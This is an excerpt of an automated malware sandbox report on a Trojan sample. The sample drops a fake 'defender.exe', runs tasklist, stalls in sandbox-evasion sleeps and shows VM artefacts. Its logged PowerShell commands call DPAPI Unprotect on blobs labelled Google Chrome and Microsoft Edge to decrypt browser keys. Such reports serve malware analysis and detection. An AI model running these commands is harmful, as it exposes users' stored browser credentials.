Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3902
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2551
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2558
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 403
Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 887
Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 867
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\d3dcompiler_47.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\libEGL.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\vk_swiftshader.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\vulkan-1.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\libGLESv2.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\libGLESv2.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\resources\elevate.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\nsis7z.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\31dd1108-f1cf-4a57-b5c5-108839a99b19.tmp.node
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\libEGL.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\System.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\d3dcompiler_47.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3916 | Thread sleep count: 3902 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3916 | Thread sleep count: 2551 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5776 | Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1832 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2664 | Thread sleep count: 2558 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2780 | Thread sleep count: 403 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4876 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5076 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | File Volume queried: C:\Users\user\AppData\Roaming\defender\Code Cache\wasm FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | File Volume queried: C:\Users\user\AppData\Roaming\defender\Code Cache\js FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | File Volume queried: C:\Users\user\AppData\Roaming\defender\blob_storage\eec40a8b-ed63-48a3-8846-2bb7e50354b4 FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | File Volume queried: C:\Users\user\AppData\Roaming\defender\Cache\Cache_Data FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | File opened: C:\Users\user~1\AppData
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | File opened: C:\Users\user~1\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | File opened: C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | File opened: C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\resources
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | File opened: C:\Users\user~1\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | File opened: C:\Users\user~1
Source: explorer.exe, 0000001D.00000000.1771958390.0000000000C74000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
Source: explorer.exe, 0000001D.00000000.1772877020.0000000003249000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.
Source: explorer.exe, 0000001D.00000000.1776329895.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 0000001D.00000000.1776329895.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000001D.00000000.1772877020.0000000003249000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
Source: explorer.exe, 0000001D.00000000.1772877020.0000000003249000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
Source: explorer.exe, 0000001D.00000000.1776329895.0000000009013000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 0000001D.00000000.1772877020.0000000003249000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SVGA II
Source: explorer.exe, 0000001D.00000000.1774067541.0000000007306000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: War&Prod_VMware_xU1
Source: explorer.exe, 0000001D.00000000.1776329895.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 0000001D.00000000.1776329895.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
Source: explorer.exe, 0000001D.00000000.1776329895.0000000009052000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
Source: explorer.exe, 0000001D.00000000.1776329895.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
Source: explorer.exe, 0000001D.00000000.1776329895.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
Source: explorer.exe, 0000001D.00000000.1772877020.0000000003249000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware20,1
Source: explorer.exe, 0000001D.00000000.1772877020.0000000003249000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: explorer.exe, 0000001D.00000000.1776329895.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMWare
Source: explorer.exe, 0000001D.00000000.1776329895.0000000009052000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
Source: explorer.exe, 0000001D.00000000.1774067541.0000000007306000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 0000001D.00000000.1776329895.0000000008F27000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWT`
Source: explorer.exe, 0000001D.00000000.1772877020.0000000003249000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SVGA IIES1371
Source: explorer.exe, 0000001D.00000000.1772877020.0000000003249000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware Virtual RAM
Source: explorer.exe, 0000001D.00000000.1771958390.0000000000C74000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 0000001D.00000000.1772877020.0000000003249000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: explorer.exe, 0000001D.00000000.1776329895.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001D.00000000.1771958390.0000000000C74000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'CurrentUser')"
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,162,33,177,8,149,91,236,191,129,249,33,231,27,148,12,171,122,36,70,244,154,79,73,117,181,20,143,206,1,195,45,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,168,140,205,238,188,26,206,16,147,216,104,102,249,250,177,217,113,177,11,10,219,34,181,223,104,67,90,97,29,67,135,198,48,0,0,0,111,7,27,76,231,128,167,166,236,58,4,205,90,176,104,112,26,199,93,23,90,122,68,151,214,153,146,80,144,62,95,230,165,147,143,143,143,124,118,123,23,62,207,33,112,187,137,178,64,0,0,0,245,94,155,216,109,45,241,53,9,114,77,116,165,235,237,86,72,111,74,87,234,83,100,234,81,1,43,5,153,85,142,192,206,173,232,251,142,136,182,197,146,115,49,120,202,240,22,246,11,50,180,177,166,7,64,202,99,182,23,130,212,30,228,156), $null, 'CurrentUser')"
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Process created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe "C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\defender" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1832 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Process created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe "C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\defender" --mojo-platform-channel-handle=2132 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'CurrentUser')
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,162,33,177,8,149,91,236,191,129,249,33,231,27,148,12,171,122,36,70,244,154,79,73,117,181,20,143,206,1,195,45,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,168,140,205,238,188,26,206,16,147,216,104,102,249,250,177,217,113,177,11,10,219,34,181,223,104,67,90,97,29,67,135,198,48,0,0,0,111,7,27,76,231,128,167,166,236,58,4,205,90,176,104,112,26,199,93,23,90,122,68,151,214,153,146,80,144,62,95,230,165,147,143,143,143,124,118,123,23,62,207,33,112,187,137,178,64,0,0,0,245,94,155,216,109,45,241,53,9,114,77,116,165,235,237,86,72,111,74,87,234,83,100,234,81,1,43,5,153,85,142,192,206,173,232,251,142,136,182,197,146,115,49,120,202,240,22,246,11,50,180,177,166,7,64,202,99,182,23,130,212,30,228,156), $null, 'CurrentUser')
